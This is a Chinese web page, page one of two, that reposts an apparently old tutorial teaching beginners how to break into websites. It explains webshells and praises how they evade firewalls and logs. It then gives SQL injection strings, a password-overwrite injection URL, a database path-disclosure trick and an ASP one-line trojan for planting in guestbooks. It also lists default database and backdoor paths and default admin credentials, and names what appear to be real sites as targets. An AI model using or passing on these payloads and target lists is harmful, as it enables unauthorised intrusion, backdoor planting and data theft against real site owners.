非常不错的脚本入侵基础知识总结第1/2页
非常不错的脚本入侵基础知识总结第1/2页
发布时间:2016-12-26 来源:查字典编辑
摘要:一.Webshell是什么?这是很多朋友在疑惑的问题,什么是webshell?今天我们就讲讲这个话题!webshell是web入侵的脚本攻击...

一.Webshell是什么?这是很多朋友在疑惑的问题,

什么是webshell?今天我们就讲讲这个话题!

webshell是web入侵的脚本攻击工具。

简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。</P>

为了更好理解webshell我们学习两个概念:

什么是“木马”?“木马”全称是“特洛伊木马(Trojan<BR>Horse)”,原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上,“特洛伊木马”指一些程序设计人员在其可从网络上下载(Download)的应用程序或游戏中,包含了可以控制用户的计算机系统的程序,可能造成用户的系统被破坏甚至瘫痪。

什么是后门?大家都知道,一台计算机上有65535个端口,那么如果把计算机看作是一间屋子,那么这65535个端口就可以它看做是计算机为了与外界连接所开的65535扇门。每个门的背后都是一个服务。有的门是主人特地打开迎接客人的(提供服务),有的门是主人为了出去访问客人而开设的(访问远程服务)——理论上,剩下的其他门都该是关闭着的,但偏偏由于各种原因,很多门都是开启的。于是就有好事者进入,主人的隐私被刺探,生活被打扰,甚至屋里的东西也被搞得一片狼迹。这扇悄然被开启的门——就是“后门”。

webshell的优点

webshell最大的优点就是可以穿越防火墙,由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的,因此不会被防火墙拦截。并且使用webshell一般不会在系统日志中留下记录,只会在网站的web日志中留下一些数据提交记录,没有经验的管理员是很难看出入侵痕迹的。

如何寻找webshel:

1,脚本攻击SQL注入<BR>

2,使用注入工具<BR>

3,在浏览器里打开百度,输入搜索关键词"在本页操作不需要FSO支持&"或者"一次只能执行一个操作",然后点击搜索,很快就可以看到检索到了大量的查询结果.<BR>其他的东西,暂时不多说了,以后再深入吧,每天准备一个话题,需要的是巨大的毅力和努力,我们举办的每日讲座就是为了通俗容易懂的普及信息安全知识,让不喜欢看文章,觉得信息安全知识很深奥枯燥的人都明白,其实他只要花很少时间,就可以了解很多信息安全知识!

二.菜鸟学习入侵的14种可利用方法

作者:佚名文章来源:本站原创点击数:560更新时间:2006-8-9

1.上传漏洞[不多讲]

pS:如果看到:选择你要上传的文件[重新上传]或者出现“请登陆后使用”,80%就有漏洞了!

有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

2.注入漏洞[不多讲]

pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:

http://注入网址;updateadminsetpassword='新MD5密码'wherepassword='旧MD5密码'--[admin为表名.]

3.旁注,也就是跨站.

我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了

4.暴库:把二级目录中间的/换成%5c

EY:http://www.scbzlx.com/test/test/test.asp?test=test&test=1

如果你能看到:'E:testtestdatabasetest.asa'不是一个有效的路径。确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。

这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.

5.'or'='or'这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:

'or''='"or"a"="a')or('a'='a")or("a"="aor1=1--'or'a'='a

6.社会工程学。这个我们都知道吧。就是猜解。

7.写入ASP格式数据库。就是一句话木马[<%executerequest("value")%>],常用在留言本.

EY:http://www.scbzlx.com/book/book.asp[这个就是ASP格式的数据库],再写入一句话木马

8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.

EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp

这个站用的是:杰出校友录,源码我下过了,

默认数据库/webshell路径:databaseliangu_data.mdb后台管理:adm_login.asp密码及用户名都是admin

9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.

/Databackup/dvbbs7.MDB

/bbs/Databackup/dvbbs7.MDB

/bbs/Data/dvbbs7.MDB

/data/dvbbs7.mdb

/bbs/diy.asp

/diy.asp

/bbs/cmd.asp

/bbs/cmd.exe

/bbs/s-u.exe

/bbs/servu.exe

工具:网站猎手挖掘鸡

EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB

当前1/2页12下一页阅读全文

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新安全教程学习
热门安全教程学习
实用技巧子分类